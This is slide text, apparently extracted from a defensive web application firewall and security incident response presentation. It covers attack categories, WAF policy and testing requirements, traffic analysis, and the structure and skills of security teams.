  181. 181. 70295 © 0 1 2 3 4 5 6 7 off hours monring monring noon noon after noon after noon off hours off hours Main App Users Partners Attack AMO 1. Riding the wave 2. Decoy 3. Multi vector 1.App Stress 2.Vul hunting 3.Brute force
  182. 182. 70295 © 0 1 2 3 4 5 6 7 off hours monring monring noon noon after noon after noon off hours off hours Main App Users Partners Attack Traffic Riding attacks Who is doing ETF and who is doing ATF ?
  183. 183. 70295 © Attack Elements ▪ Vulnerability ▪ Attack Surface ▪ Attack Agent ▪ Exploit ▪ Attack Vector ▪ AMO GRAPHS STATISTICS LOGS DASHBOARD REPORTING • Entities • Detections • Prevention • Rule • Rule sets Protection elements Protection rule Protection policy PROTOCOL PAYLOAD – HEADERS USER INPUT SIGNATURES ANOMALY RESTRICTIONS CLIENT INTERROGATION ALERT BLOCK LIMIT FOLLOW UP Search the AE’s in the PE’s using the reporting to stop the attacks with Prevention rules Relationships : AE, PE, Policy and Reporting
  184. 184. 70295 © PR No Hits OK FN Hits RA FP 1. Enforce 2. Monitoring -> Refine 3. Enforce 4. Alert -> Refine Block -> alert – refine 1 2 3 4 Rule maturity = Time + Traffic Handling RA/FP/FN/FA 1. RA – Real Attack: true attack needs blocking 2. FP – False Positive: wrong detection (blocking but shouldn’t) 3. FN – False Negative: lack of detection (should be blocked but not) 4. FA – False alarm: mistake
  185. 185. 70295 © BTR AMI Vulnerable AMI Under attack AMI Compromised 2. MITIGATIONS SEEK DESTROY SEEK PREVENT Y/N APPLY VERIFY SEEK RECOVER APPLY VERIFY APPLY VERIFY N=BTR 3. RESPONSE SEVERITY Y/N SEVERITY RA/FP/FN SEVERITY
  186. 186. 70295 © WA-CAV Score - Site Brute force App DDoS Vul Hunting 60% 80% 50% By requirement* Traffic Break Down Valuable users - Allow Suspicious - Monitor Malicious – Block App A 71% 6% 25% App B 20% 20% 60% App C 61% 20% 17% Security Level 63.3% 58.2% SECURITY CENTER
  187. 187. 70295 © App Attacks Incidents WAF health – site Site Traffic E:H D:S BLOCK E:URL D:A ALARM 1IP 100 Req Critical E:IP D:R RATE LIMIT Medium High 1IP 10Req 10IP 1000Req 56.00% 58.00% 60.00% 62.00% 64.00% 66.00% 68.00% 70.00% 72.00% App 1 App2 App3 App4 80% 95% 95% 20% 23% 31% WAF A – Zone 1 (Main) WAF B – Zone 2 (sub) CPU Memory Bandwidth CPU Memory Bandwidth By requirement*
  188. 188. 70295 © DDoS Brute force Web Exploits Scanners CVE hunting SECURITY CENTER App Attack Report Attacks Mitigated
  189. 189. 70295 © 0 2 4 6 8 10 12 14 16 Q4 Q1 Q2 Q3 CAV over time BF DDoS Web Expolits SECURITY CENTER CAV Attack report
  190. 190. 70295 © Mobile Users Remote employee Web Bot User Allowed automated traffic HACKED PURPOSE BUILD BOTNET Cloud Internet Traffic diversity chaos
  191. 191. 70295 © Valuable users Malicious Suspicious We now talk about CUSTOMER not USER Unknown – allow & monitoring Offending – Blocking TRAFFIC MGR WAF – the Traffic Manager
  192. 192. 70295 © / Info param5 products param6 param2 Login username password Payment pay details Credit card number checkout amount password Analytica Pre login Post login Cart no pay Pay New users 100 50 15 20 Returning users 70 44 5 45 WAF - Traffic Analyzer
  193. 193. 70295 © App: main Number of visits Time: /Search engine Per 1 day Per 1 week Per 1 month Search engine A 2 10 20 Search engine B 0 2 6 Search engine C 10 150 3000 Traffic break down Valuable customers (allowed) Allowed automation Suspicious monitored Malicious – blocked App A 71% 2% 6% 21% App B 20% 1% 20% 59% App C 61% 1.5% 20% 17% Valuable users – customers – Breakdown Total RPS 11,000 80000 Top URL 22,000 RPS 11,0000 Total session 12000 active sessions 8000 new sessions 1000 active sessions 8000 new sessions IP/ session IP-X (3000) IP-Y (1200) IP-Z (2000) IP-X (2300) IP-Y (1000) IP-Z (1500) WAF - Visibility manager
  194. 194. 70295 © Service Data Compute Know your security ! The strength the weakness and how to close the gap
  195. 195. 70295 © WAF levels: Signature Anomaly Restrictions Client interrogation ID/PS Yes No No No Bot Manager No No No Yes WAF Yes Yes Yes No WAF NG Yes Yes Yes Yes WAF levels by PE (detection) *Full requirements in SIRT.club WAF levels: Web Exploit Brute Force aDDoS Automated traffic ID/PS Partial Limited Limited Limited Bot Manager Partial Partial Partial Partial WAF Good Best Best Good WAF NG Best Best Best Best
  196. 196. 70295 © Parser - Entities Protocols ❑ HTTP 1.1 ❑ API ❑ Mobile API Payloads ❑ Text ❑ JSON ❑ XML User input ❑ Login ❑ Search text ❑ Posting Traps - Detections Signature ❑ Informational ❑ Generic exploits ❑ Specific exploit Anomaly ❑ Request per second (RPS) ❑ Failed log in (FLI) ❑ Session opening Restriction ❑ Characters sets ❑ RFC & evasion ❑ Flow Client interrogation ❑ CAPTHCA ❑ Client capabilities ❑ Source ID (SID) Enforcer - Prevention Action ALERT ❑ GUI: dashboard / iLog ❑ Email / SMS ❑ Instant messaging BLOCK ❑ Blocking page ❑ TCP FIN / RESET /Drop ❑ Stripping / Cloaking LIMIT ❑ Rate limiting (RPS) ❑ Time limiting ❑ Session limiting FOLLOW UP ❑ Redirect to main / honeypot ❑ Soft Blocking ❑ Retaliation WAF policy requirement (DSMM) by PE
  197. 197. 70295 © WAF RFP App ❑ Classic ❑ Modern ❑ Mix Location Cloud ❑ Cloud public ❑ Cloud Private ❑ Multi cloud ❑ Hybrid (cloud <-> op) On perm ❑ On perm ❑ multi on perm ❑ Hybrid (op<->cloud) Management Management ❑ For you ❑ Semi ❑ You WAF type ❑ Edge ❑ Perimeter ❑ Perimeter (360) ❑ Mesh Software SW type ❑ HW OS SW ❑ OS SW ❑ SW Virtualizations ❑ vOS ❑ vSW - Container ❑ vSW – K Security Mgmt – Sec OPS Policy level ❑ ID/PS ❑ Bot MGR ❑ WAF ❑ WAF NG Security Reporting ❑ Security center (learning) ❑ WAG reporting ❑ graphs ❑ Risk reporting ❑ Statistics ❑ Mitigation reporting ❑ Event log ❑ Forensics OPS Deployment ❑ ISO file ❑ RPM ❑ VM image Config ❑ API ❑ Config file ❑ GUI ❑ ______ WAF requirement (DSMM)
  198. 198. 70295 © Utilities Logging ❑ Local ❑ Remote ❑ All request ❑ Hits only Log Repository ❑ Internal ❑ External ❑ Size: 6T ❑ Time: 6-month request ❑ Fault tolerance 3rd party ❑ ICAP ❑ Network FW integration CM ❑ Local ❑ Dedicated ❑ CP utility ❑ Pull / push config ❑ Update/ upgrades ❑ WAF centralized report ❑ Policy Traffic aggregation (unified reporting ) Updates and upgrades Updates ❑ Break Fix ❑ CVE updates ❑ New features ❑ Hotfix ❑ Engineer hot fix ❑ Full update file ❑ GUI ❑ API ❑ Config ❑ RPM ❑ SW ❑ ISO – OS + SW ❑ ISO – SW Upgrade ❑ Migration tools ❑ WAF Config restore ❑ Rollback Upgrades / upgrade schema ❑ Stand by / Active ❑ Active / Active ❑ New / old Life time policy ❑ Sustain release ❑ Feature release ❑ Product life time ❑ Support life time HA HA ❑ Load balancing ❑ Cluster ❑ Scaling Support tools Support reporting ❑ Audit log ❑ Maintenance ❑ System ❑ Debug Policy export – restore ❑ Text ❑ HTML ❑ Binary ❑ JSON ❑ XML ❑ Manual GUI ❑ API WAF requirement (DSMM)
  199. 199. 70295 © Web app App Web app Virtualization –OS/HW Web Server App Server Database Server Testing types App WAF Testing app for vulnerability Testing infrastructure for vulnerabilities Testing traffic loads Testing scaling mechanism Testing supply chain for vulnerabilities Testing functionality Testing hardening n defaults Testing User input Testing fuzzing Testing coverage
  200. 200. 70295 © 95% Web app Web Server App Server Database Server 80% App Web apps Virtualization –OS/HW App Capacity planning – App / WAF 98% 80% Breaking points
  201. 201. 70295 © Web app App Web app Virtualization –OS/HW Web Server App Server Database Server Testing App without WAF Security testing – App / WAF Testing the WAF Testing App with WAF ✓ AE testing - RA ✓ PE testing –CAV/SAP ✓ SE testing - FN
  202. 202. 70295 © Brute force App DDoS Web exploit 60% 70% 50% Automated attacks 35% Traps - Detections Signature ❑ Information ❑ Generic exploits ❑ Specific exploit ❑ Customer Anomaly ❑ Request Sec (RPS) ❑ Failed log in (FLI) ❑ Session increase ❑ Session opening Restriction ❑ Characters sets ❑ RFC & evasion ❑ Evasion ❑ Flow ❑ Structure Client interrogation ❑ CAPTHCA ❑ Client capabilities ❑ Source ID (SID) ❑ If then Enforcer - Prevention Action ALERT ❑ GUI: dashboard / iLog ❑ Email / SMS ❑ Instant messaging ❑ Mobile App BLOCK ❑ Blocking page ❑ TCP FIN / RESET ❑ Drop connection ❑ Stripping / Cloaking LIMIT ❑ Rate limiting (RPS) ❑ Time limiting ❑ Session limiting ❑ Access limiting FOLLOW UP ❑ Redirect to main ❑ Redirect to honeypot ❑ Soft Blocking WAF assessment
  203. 203. 70295 © How to test it NF Vulnerability scanner Pen test Red team Router NWFW WAFNG ADC/LB Security controls test Vulnerability scanner (CVE) Pen test – manual / crafted botnets Bug bounty - mass wisdom Red team - proprietary tools
  204. 204. 70295 © • Testing for Vulnerability in the web application • Use WAF to virtual patch • Patch the app • Testing for Vulnerability in the WAF • Patch the WAF • DP vs CP • WAF Bypass – WAF can be bypass but no vulnerability in the web app to protect • Fix the WAF • Holistic approach • Security exposure – WAF can be bypass and exposing the web app to a vulnerability that exits (FN) • Fix the WAF • Holistic approach Vulnerability and Security exposure
  205. 205. 70295 © web cloud NF NF App srv web cloud cloud NF MESH MESH SECURITY MGMT WAF testing types Unified results
  206. 206. 70295 © SOC SECURITY TEAM External STA SECURITY TESTING Testing Personnel Internal STA CSIRT PSIRT PSIRT – Patching products/ application CSIRT – Any type of attack on/in the org STA – Org security advisor / SGP / assessment 3RD PARTY EVALUATOR SECURITY TESTING
  207. 207. 70295 © WAF security score - internal Brute force App DDoS Vul Hunting WAF security score - external I: 60% E: 60% A: 60% I: 80% E: 70% A: 75% I: 40% E: 50% A: 45% WAF assessment security score: • Internal testing • External testing • Average WAF assessment
  208. 208. 70295 © Service Data Compute Disruption Breach Compromised • Ami under attack • Ami vulnerable • Ami compromised • Entities • Detections • Prevention • Rule • Rule sets Protection elements Protection rule Protection policy CURRENT POLICY BYPASS POLICY MISSING POLICY FN – missing RA – rules set FP – clean traffic SE – bypass Current Limitation improve Pre prod Base prod Post prod
  209. 209. 70295 © Defensive Security Personal protector of the realm Show time Powered by SIRT.club The human factor
  210. 210. Vendor A Hardware Vendor B Software Consulting Apps provider 3rd part lib Users Cloud provider Data center provider App provider Complex echo system Hacking Crime Hacking Gov Internet provides Open source Misc Vendors Misc visitors
  211. 211. 70295 © PSIRT Vul Mgmt publication Industry comm CSIRT IR readiness SIR Recovery STA SGP Eval legal SIRT pillars and responsibility
  212. 212. 70295 © Dev Support Pre Sales Sales PM Marketing Security Trusted Advisor (STA) Legal Press Tech Comm Social Industry Media In the ORG Outside the ORG
  213. 213. 70295 © GM Sr SE SIRT scaling VP Mgr NA SME Sr SE SE Jn SE Mgr WW SME Sr SE SE Dir SIRT Dir Mgr NA Sr SE SE Jn SE • CSIRT • PSIRT • TASIRT CSIRT PSIRT TASIRT TASIRT PSIRT CSIRT PSIRT CSIRT CSIRT PSIRT
  214. 214. 70295 © SE’s Dir/Mgr Management CSO EVP PSIRT VP Dir/Mgr SE’s CSIRT VP Dir/Mgr SE’s TASIRT VP Dir/Mgr SE’s
  215. 215. 70295 © Security Personnel – Traditional CODERS ARCHITECT Staging ENV Prod ENV DEV OPS NF WAF NG Application Server/s Web Server/s Database Server/s ▪ Deployment – WAF/NF/LB, DNS, ▪ Networking ▪ HW, SW – install, update, upgrade ▪ Storage ▪ …. ▪ Developing the Web App ▪ Web servers ▪ App server ▪ Data bases ▪ Sessions management ▪ Functionality ▪ …. Where should security be ?
  216. 216. 70295 © Security Personnel – Modern CODERS ARCHITECT Staging ENV Prod ENV DEV OPS NF WAF NG ▪ App – CIA ▪ Resources ▪ Security ▪ …. ▪ Developing the Web App ▪ Microservices ▪ Containerized ▪ Functionality ▪ …. DEV OPS ▪ Deployment – WAF/NF/LB, DNS, ▪ Networking ▪ HW, SW – install, update, upgrade ▪ Storage ▪ …. Where should security be ? Dev ENV
  217. 217. 70295 © Policy building Hardware Operating system WAF Network SIR Configuration / Setups / Updates CLOUD DP - PE CP Managing the software and security Vendor manage You manage You / Vendor manage Reporting
  218. 218. 70295 © SE Matrix Knowledge (theory) Skills (hands on) Experience (time) Notes Jr SE Sr A STA Jr SE Sr A STA Jr SE Sr A STA Target Y Y Y Y Y i ii iii iii iii 1Y 3Y 6Y 10Y 14Y Attack Y Y Y Y Y ii iii iii iii iii Security Y Y Y Y ii iii iii iii iii Policy Y Y Y Y i i iii iii iii Incidents Y Y Y ii iii iii iii Architecture Y Y i iii ii iii Operations Y Y Y Y ii i i iii Traffic control Y Y iii iii iii Assessment Y i i iii SIRT • Jn SE • SE • Sr SE • Architect • Security Trusted Advisor i. Basic level ii. Advance level iii. SME – Expert
  219. 219. 70295 © 6. SECURITY DESIGN 4. POLICY BUILDING 5. RESPONSE 8. OPERATIONS 1. TARGET 2. THREAT INTEL 3. SECURITY 7. TRAFFIC MANAGEMENT 9. ASSESSMENT Jn SE SE Sr SE Architect TSA 1 2 3 4 1) You think you know but you don’t know 2) You know that you don’t know – learning 3) You don’t know that you know – value 4) You know that you know – Master Time/ experience Knowledge
  220. 220. 70295 © PSIRT CSIRT STA Management (CSO) One-time tasks Daily tasks Weekly tasks Twice-monthly tasks Monthly tasks Quarterly tasks Twice-yearly tasks Yearly tasks Per need tasks Mission board
  221. 221. 70295 http://SIRT.club ©
  222. 222. 70295 © Keep it safe

×